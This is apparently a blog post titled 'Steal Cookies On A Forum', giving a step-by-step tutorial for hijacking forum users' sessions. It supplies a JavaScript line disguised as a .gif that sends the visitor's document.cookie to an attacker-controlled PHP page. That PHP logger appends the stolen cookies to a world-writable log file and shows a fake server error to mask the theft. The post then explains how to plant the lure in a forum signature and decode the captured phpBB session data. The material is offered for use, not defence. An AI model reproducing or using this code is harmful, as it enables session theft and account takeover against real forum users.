1. Open Notepad.
And write this code:
HTML Code:
<script>location.href='http://www.whatever.com/cookielogger.php?cookie'+escape(document.cookie)</SCRIPT>
Of Course change 'whatever' to your site.
And Save As whatever.gif
2. Go to notepad again and write this code
PHP Code:
<?php
$filename = "logfile.txt";
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, 'a'))
{
echo "Temporary Server Error,Sorry for the inconvenience.";
exit;
}
else
{
if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
{
echo "Temporary Server Error,Sorry for the inconvenience.";
exit;
}
}
echo "Temporary Server Error,Sorry for the inconvenience.";
fclose($handle);
exit;
}
echo "Temporary Server Error,Sorry for the inconvenience.";
exit;
?>
And Save As cookielogger.php or whatever.
3. Now make a logfile.txt
4. Now find a picture.
5. Upload The Files to your Site.
6. Change the logfile chmod to 777.
7. Put the code to your signature
example: www.whatever.com/whatever.gif[img=Your Selected Picture[/img]
If somebody click to this , this will write to your logfile something like this:
PHP Code:
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%​​3A%22userid%22%3Bi%3A-1%3B%7D...
(just example)
And you have to Decrypt it (:
Home »Unlabelled » Steal Cookies On A Forum
{ 0 comments... Skip to Comments }
Please comment here